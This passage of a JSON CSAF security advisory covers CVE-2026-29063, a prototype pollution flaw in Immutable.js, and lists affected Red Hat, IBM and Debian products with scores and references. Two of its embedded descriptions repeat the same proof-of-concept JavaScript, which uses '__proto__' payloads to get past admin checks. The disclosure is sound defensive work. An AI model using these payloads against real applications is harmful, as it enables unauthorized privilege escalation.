{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or being kept up to date in real time. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-29063",
        "tracking": {
            "current_release_date": "2026-04-03T00:31:48.449054Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-29063",
            "initial_release_date": "2026-03-04T21:51:00.240449Z",
            "revision_history": [
                {
                    "date": "2026-03-04T21:51:00.240449Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (6).| CWES updated (1)."
                },
                {
                    "date": "2026-03-04T21:51:08.569005Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-05T00:20:49.727155Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (2).| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-03-05T00:21:02.713132Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T19:26:22.250705Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-06T19:26:26.796784Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T19:39:02.212882Z",
                    "number": "7",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (3).| References created (4).| CWES updated (1).| Unknown change."
                },
                {
                    "date": "2026-03-06T19:39:03.755853Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T22:07:55.522144Z",
                    "number": "9",
                    "summary": "Description removed for source.| Description created for source.| References created (3)."
                },
                {
                    "date": "2026-03-06T23:39:42.553190Z",
                    "number": "10",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-07T00:21:02.917199Z",
                    "number": "11",
                    "summary": "Description removed for source.| Description created for source.| Products created (2).| Products removed (1).| References created (4)."
                },
                {
                    "date": "2026-03-07T00:46:27.387786Z",
                    "number": "12",
                    "summary": "Source created.| CVE status created. (valid)| Products created (2)."
                },
                {
                    "date": "2026-03-07T00:46:35.147671Z",
                    "number": "13",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-07T06:43:38.013427Z",
                    "number": "14",
                    "summary": "Description created for source."
                },
                {
                    "date": "2026-03-07T14:47:10.259816Z",
                    "number": "15",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T09:35:46.559400Z",
                    "number": "16",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T09:35:49.678222Z",
                    "number": "17",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T12:26:16.639248Z",
                    "number": "18",
                    "summary": "Source connected.| CVE status created. (valid)| Products connected (1).| References created (6)."
                },
                {
                    "date": "2026-03-25T12:26:18.579942Z",
                    "number": "19",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T02:42:01.621529Z",
                    "number": "20",
                    "summary": "Source created.| CVE status created. (valid)"
                },
                {
                    "date": "2026-03-26T02:42:15.949301Z",
                    "number": "21",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-03T00:31:24.336717Z",
                    "number": "22",
                    "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (8).| Product Remediations created (2).| Product Identifiers created (24).| Product Identifiers removed (24).| References created (19).| CWES updated (1)."
                },
                {
                    "date": "2026-04-03T00:31:38.059265Z",
                    "number": "23",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "23"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/1.11",
                                        "product": {
                                            "name": "vers:rpm/1.11",
                                            "product_id": "CSAFPID-5986015",
                                            "product_identification_helper": {
                                                "cpe": "cpe:/a:redhat:network_observ_optr:1.11::el9"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "Network Observability (NETOBSERV) 1.11.1"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773992622",
                                        "product": {
                                            "name": "vers:oci/1773992622",
                                            "product_id": "CSAFPID-5986016",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/network-observability-cli-rhel9@sha256%3Ab0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80?arch=ppc64le&repository_url=registry.redhat.io/network-observability&tag=1773992622"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "network-observability-cli-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774431392",
                                        "product": {
                                            "name": "vers:oci/1774431392",
                                            "product_id": "CSAFPID-5986020",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/network-observability-console-plugin-compat-rhel9@sha256%3A40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b?arch=amd64&repository_url=registry.redhat.io/network-observability&tag=1774431392"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "network-observability-console-plugin-compat-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774431617",
                                        "product": {
                                            "name": "vers:oci/1774431617",
                                            "product_id": "CSAFPID-5986021",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256%3A51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c?arch=s390x&repository_url=registry.redhat.io/network-observability&tag=1774431617"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "network-observability-console-plugin-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774887582",
                                        "product": {
                                            "name": "vers:oci/1774887582",
                                            "product_id": "CSAFPID-5986017",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256%3Adc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518?arch=arm64&repository_url=registry.redhat.io/network-observability&tag=1774887582"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "network-observability-ebpf-agent-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773997913",
                                        "product": {
                                            "name": "vers:oci/1773997913",
                                            "product_id": "CSAFPID-5986018",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256%3Aa72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088?arch=s390x&repository_url=registry.redhat.io/network-observability&tag=1773997913"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "network-observability-flowlogs-pipeline-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774962696",
                                        "product": {
                                            "name": "vers:oci/1774962696",
                                            "product_id": "CSAFPID-5986022",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/network-observability-operator-bundle@sha256%3A325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607?arch=amd64&repository_url=registry.redhat.io/network-observability&tag=1774962696"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "network-observability-operator-bundle"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774859742",
                                        "product": {
                                            "name": "vers:oci/1774859742",
                                            "product_id": "CSAFPID-5986019",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/network-observability-rhel9-operator@sha256%3Adc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453?arch=s390x&repository_url=registry.redhat.io/network-observability&tag=1774859742"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "network-observability-rhel9-operator"
                            }
                        ],
                        "category": "product_family",
                        "name": "Network Observability (NETOBSERV)"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/liberty <26.0.0.4",
                                "product": {
                                    "name": "vers:unknown/liberty <26.0.0.4",
                                    "product_id": "CSAFPID-5905823"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "WebSphere Application Server"
                    }
                ],
                "category": "vendor",
                "name": "IBM"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<3.8.3",
                                "product": {
                                    "name": "vers:unknown/>=0|<3.8.3",
                                    "product_id": "CSAFPID-5767901"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=4.0.0-rc.1|<4.3.8",
                                "product": {
                                    "name": "vers:unknown/>=4.0.0-rc.1|<4.3.8",
                                    "product_id": "CSAFPID-5767900"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=5.0.0|<5.1.5",
                                "product": {
                                    "name": "vers:unknown/>=5.0.0|<5.1.5",
                                    "product_id": "CSAFPID-5759791"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "immutable"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<3.8.3",
                                "product": {
                                    "name": "vers:unknown/<3.8.3",
                                    "product_id": "CSAFPID-5767297"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<4.3.7",
                                "product": {
                                    "name": "vers:unknown/<4.3.7",
                                    "product_id": "CSAFPID-5767298"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<5.1.5",
                                "product": {
                                    "name": "vers:unknown/<5.1.5",
                                    "product_id": "CSAFPID-5767299"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "immutable-js"
                    }
                ],
                "category": "vendor",
                "name": "immutable-js"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/unknown",
                                        "product": {
                                            "name": "vers:deb/unknown",
                                            "product_id": "CSAFPID-5768418"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "node-immutable"
                            }
                        ],
                        "category": "product_family",
                        "name": "bookworm"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/unknown",
                                        "product": {
                                            "name": "vers:deb/unknown",
                                            "product_id": "CSAFPID-5768419"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "node-immutable"
                            }
                        ],
                        "category": "product_family",
                        "name": "bullseye"
                    }
                ],
                "category": "vendor",
                "name": "debian"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-29063",
            "cwe": {
                "id": "CWE-1321",
                "name": "Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')"
            },
            "flags": [
                {
                    "label": "vulnerable_code_not_present",
                    "product_ids": [
                        "CSAFPID-5986016",
                        "CSAFPID-5986017",
                        "CSAFPID-5986018",
                        "CSAFPID-5986019",
                        "CSAFPID-5986020",
                        "CSAFPID-5986022"
                    ]
                }
            ],
            "notes": [
                {
                    "category": "description",
                    "text": "Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-29063"
                },
                {
                    "category": "description",
                    "text": "Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-29063"
                },
                {
                    "category": "description",
                    "text": "## Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nA Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.\n\n## Affected APIs\n\n| API                                     | Notes                                                       |\n| --------------------------------------- | ----------------------------------------------------------- |\n| `mergeDeep(target, source)`              | Iterates source keys via `ObjectSeq`, assigns `merged[key]` |\n| `mergeDeepWith(merger, target, source)`  | Same code path                                              |\n| `merge(target, source)`                    | Shallow variant, same assignment logic                      |\n| `Map.toJS()`                              | `object[k] = v` in `toObject()` with no `__proto__` guard   |\n| `Map.toObject()`                            | Same `toObject()` implementation                            |\n| `Map.mergeDeep(source)`                  | When source is converted to plain object                    |\n\n\n\n## Patches\n_Has the problem been patched? 
What versions should users upgrade to?_\n\n| major version | patched version |\n| --- | --- |\n| 3.x | 3.8.3 |\n| 4.x | 4.3.7 |\n| 5.x | 5.1.5 |\n\n## Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n- [Validate user input](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#validate_user_input)\n- [Node.js flag --disable-proto](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#node.js_flag_--disable-proto)\n- [Lock down built-in objects](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#lock_down_built-in_objects)\n- [Avoid lookups on the prototype](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#avoid_lookups_on_the_prototype)\n- [Create JavaScript objects with null prototype](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#create_javascript_objects_with_null_prototype)\n\n## Proof of Concept\n\n### PoC 1 — mergeDeep privilege escalation\n\n```javascript\n\"use strict\";\nconst { mergeDeep } = require(\"immutable\"); // v5.1.4\n\n// Simulates: app merges HTTP request body (JSON) into user profile\nconst userProfile = { id: 1, name: \"Alice\", role: \"user\" };\nconst requestBody = JSON.parse(\n  '{\"name\":\"Eve\",\"__proto__\":{\"role\":\"admin\",\"admin\":true}}',\n);\n\nconst merged = mergeDeep(userProfile, requestBody);\n\nconsole.log(\"merged.name:\", merged.name); // Eve   (updated correctly)\nconsole.log(\"merged.role:\", merged.role); // user  (own property wins)\nconsole.log(\"merged.admin:\", merged.admin); // true  ← INJECTED via __proto__!\n\n// Common security checks — both bypassed:\nconst isAdminByFlag = (u) => u.admin === true;\nconst isAdminByRole = (u) => u.role === \"admin\";\nconsole.log(\"isAdminByFlag:\", isAdminByFlag(merged)); // true  ← BYPASSED!\nconsole.log(\"isAdminByRole:\", isAdminByRole(merged)); // false (own role=user 
wins)\n\n// Stealthy: Object.keys() hides 'admin'\nconsole.log(\"Object.keys:\", Object.keys(merged)); // ['id', 'name', 'role']\n// But property lookup reveals it:\nconsole.log(\"merged.admin:\", merged.admin); // true\n```\n\n### PoC 2 — All affected APIs\n\n```javascript\n\"use strict\";\nconst { mergeDeep, mergeDeepWith, merge, Map } = require(\"immutable\");\n\nconst payload = JSON.parse('{\"__proto__\":{\"admin\":true,\"role\":\"superadmin\"}}');\n\n// 1. mergeDeep\nconst r1 = mergeDeep({ user: \"alice\" }, payload);\nconsole.log(\"mergeDeep admin:\", r1.admin); // true\n\n// 2. mergeDeepWith\nconst r2 = mergeDeepWith((a, b) => b, { user: \"alice\" }, payload);\nconsole.log(\"mergeDeepWith admin:\", r2.admin); // true\n\n// 3. merge\nconst r3 = merge({ user: \"alice\" }, payload);\nconsole.log(\"merge admin:\", r3.admin); // true\n\n// 4. Map.toJS() with __proto__ key\nconst m = Map({ user: \"alice\" }).set(\"__proto__\", { admin: true });\nconst r4 = m.toJS();\nconsole.log(\"toJS admin:\", r4.admin); // true\n\n// 5. Map.toObject() with __proto__ key\nconst m2 = Map({ user: \"alice\" }).set(\"__proto__\", { admin: true });\nconst r5 = m2.toObject();\nconsole.log(\"toObject admin:\", r5.admin); // true\n\n// 6. Nested path\nconst nested = JSON.parse('{\"profile\":{\"__proto__\":{\"admin\":true}}}');\nconst r6 = mergeDeep({ profile: { bio: \"Hello\" } }, nested);\nconsole.log(\"nested admin:\", r6.profile.admin); // true\n\n// 7. 
Confirm NOT global\nconsole.log(\"({}).admin:\", {}.admin); // undefined (global safe)\n```\n\n**Verified output against immutable@5.1.4:**\n\n```\nmergeDeep admin: true\nmergeDeepWith admin: true\nmerge admin: true\ntoJS admin: true\ntoObject admin: true\nnested admin: true\n({}).admin: undefined  ← global Object.prototype NOT polluted\n```\n\n\n## References\n_Are there any links users can visit to find out more?_\n\n- [JavaScript prototype pollution](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution)",
                    "title": "github - https://github.com/advisories/GHSA-wf6x-7x77-mvgw"
                },
                {
                    "category": "description",
                    "text": "## Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nA Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.\n\n## Affected APIs\n\n| API                                     | Notes                                                       |\n| --------------------------------------- | ----------------------------------------------------------- |\n| `mergeDeep(target, source)`              | Iterates source keys via `ObjectSeq`, assigns `merged[key]` |\n| `mergeDeepWith(merger, target, source)`  | Same code path                                              |\n| `merge(target, source)`                    | Shallow variant, same assignment logic                      |\n| `Map.toJS()`                              | `object[k] = v` in `toObject()` with no `__proto__` guard   |\n| `Map.toObject()`                            | Same `toObject()` implementation                            |\n| `Map.mergeDeep(source)`                  | When source is converted to plain object                    |\n\n\n\n## Patches\n_Has the problem been patched? 
What versions should users upgrade to?_\n\n| major version | patched version |\n| --- | --- |\n| 3.x | 3.8.3 |\n| 4.x | 4.3.7 |\n| 5.x | 5.1.5 |\n\n## Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n- [Validate user input](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#validate_user_input)\n- [Node.js flag --disable-proto](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#node.js_flag_--disable-proto)\n- [Lock down built-in objects](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#lock_down_built-in_objects)\n- [Avoid lookups on the prototype](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#avoid_lookups_on_the_prototype)\n- [Create JavaScript objects with null prototype](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#create_javascript_objects_with_null_prototype)\n\n## Proof of Concept\n\n### PoC 1 — mergeDeep privilege escalation\n\n```javascript\n\"use strict\";\nconst { mergeDeep } = require(\"immutable\"); // v5.1.4\n\n// Simulates: app merges HTTP request body (JSON) into user profile\nconst userProfile = { id: 1, name: \"Alice\", role: \"user\" };\nconst requestBody = JSON.parse(\n  '{\"name\":\"Eve\",\"__proto__\":{\"role\":\"admin\",\"admin\":true}}',\n);\n\nconst merged = mergeDeep(userProfile, requestBody);\n\nconsole.log(\"merged.name:\", merged.name); // Eve   (updated correctly)\nconsole.log(\"merged.role:\", merged.role); // user  (own property wins)\nconsole.log(\"merged.admin:\", merged.admin); // true  ← INJECTED via __proto__!\n\n// Common security checks — both bypassed:\nconst isAdminByFlag = (u) => u.admin === true;\nconst isAdminByRole = (u) => u.role === \"admin\";\nconsole.log(\"isAdminByFlag:\", isAdminByFlag(merged)); // true  ← BYPASSED!\nconsole.log(\"isAdminByRole:\", isAdminByRole(merged)); // false (own role=user 
wins)\n\n// Stealthy: Object.keys() hides 'admin'\nconsole.log(\"Object.keys:\", Object.keys(merged)); // ['id', 'name', 'role']\n// But property lookup reveals it:\nconsole.log(\"merged.admin:\", merged.admin); // true\n```\n\n### PoC 2 — All affected APIs\n\n```javascript\n\"use strict\";\nconst { mergeDeep, mergeDeepWith, merge, Map } = require(\"immutable\");\n\nconst payload = JSON.parse('{\"__proto__\":{\"admin\":true,\"role\":\"superadmin\"}}');\n\n// 1. mergeDeep\nconst r1 = mergeDeep({ user: \"alice\" }, payload);\nconsole.log(\"mergeDeep admin:\", r1.admin); // true\n\n// 2. mergeDeepWith\nconst r2 = mergeDeepWith((a, b) => b, { user: \"alice\" }, payload);\nconsole.log(\"mergeDeepWith admin:\", r2.admin); // true\n\n// 3. merge\nconst r3 = merge({ user: \"alice\" }, payload);\nconsole.log(\"merge admin:\", r3.admin); // true\n\n// 4. Map.toJS() with __proto__ key\nconst m = Map({ user: \"alice\" }).set(\"__proto__\", { admin: true });\nconst r4 = m.toJS();\nconsole.log(\"toJS admin:\", r4.admin); // true\n\n// 5. Map.toObject() with __proto__ key\nconst m2 = Map({ user: \"alice\" }).set(\"__proto__\", { admin: true });\nconst r5 = m2.toObject();\nconsole.log(\"toObject admin:\", r5.admin); // true\n\n// 6. Nested path\nconst nested = JSON.parse('{\"profile\":{\"__proto__\":{\"admin\":true}}}');\nconst r6 = mergeDeep({ profile: { bio: \"Hello\" } }, nested);\nconsole.log(\"nested admin:\", r6.profile.admin); // true\n\n// 7. 
Confirm NOT global\nconsole.log(\"({}).admin:\", {}.admin); // undefined (global safe)\n```\n\n**Verified output against immutable@5.1.4:**\n\n```\nmergeDeep admin: true\nmergeDeepWith admin: true\nmerge admin: true\ntoJS admin: true\ntoObject admin: true\nnested admin: true\n({}).admin: undefined  ← global Object.prototype NOT polluted\n```\n\n\n## References\n_Are there any links users can visit to find out more?_\n\n- [JavaScript prototype pollution](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution)",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-wf6x-7x77-mvgw.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.",
                    "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-29063"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS). Note that the upstream proof of concept reproduced in this advisory verifies that the injected properties land on the prototype of the object returned by the affected API and that the global Object.prototype is not polluted; the practical impact therefore depends on how the application consumes that returned object (e.g. authorization checks that read properties the object does not define itself).",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6428.json"
                },
                {
                    "category": "other",
                    "text": "0.0006",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "8.7",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "4.4",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "The value of the most recent CVSS (V3) score, VENDOR FIX as product remediation category, There is product data available from source Certbundde",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "There is cwe data available from source Nvd, Is related to CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'))",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "fixed": [
                    "CSAFPID-5986021"
                ],
                "known_affected": [
                    "CSAFPID-5759791",
                    "CSAFPID-5767297",
                    "CSAFPID-5767298",
                    "CSAFPID-5767299",
                    "CSAFPID-5767900",
                    "CSAFPID-5767901",
                    "CSAFPID-5768418",
                    "CSAFPID-5768419",
                    "CSAFPID-5905823"
                ],
                "known_not_affected": [
                    "CSAFPID-5986016",
                    "CSAFPID-5986017",
                    "CSAFPID-5986018",
                    "CSAFPID-5986019",
                    "CSAFPID-5986020",
                    "CSAFPID-5986022"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-wf6x-7x77-mvgw"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-wf6x-7x77-mvgw"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-wf6x-7x77-mvgw.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-29063"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-29063"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/29xxx/CVE-2026-29063.json"
                },
                {
                    "category": "external",
                    "summary": "Source - debian",
                    "url": "https://security-tracker.debian.org/tracker/CVE-2026-29063"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29063"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0845.json"
                },
                {
                    "category": "external",
                    "summary": "Source - hkcert",
                    "url": "https://www.hkcert.org/security-bulletin/ibm-websphere-products-multiple-vulnerabilities_20260326"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6428.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://github.com/immutable-js/immutable-js/commit/16b3313fdf2c5f579f10799e22869f6909abf945"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://github.com/immutable-js/immutable-js/commit/6ed4eb626906df788b08019061b292b90bc718cb"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-wf6x-7x77-mvgw"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://github.com/immutable-js/immutable-js/issues/2178"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://github.com/immutable-js/immutable-js/commit/6e2cf1cfe6137e72dfa48fc2cfa8f4d399d113f9"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0845.json"
                },
                {
                    "category": "external",
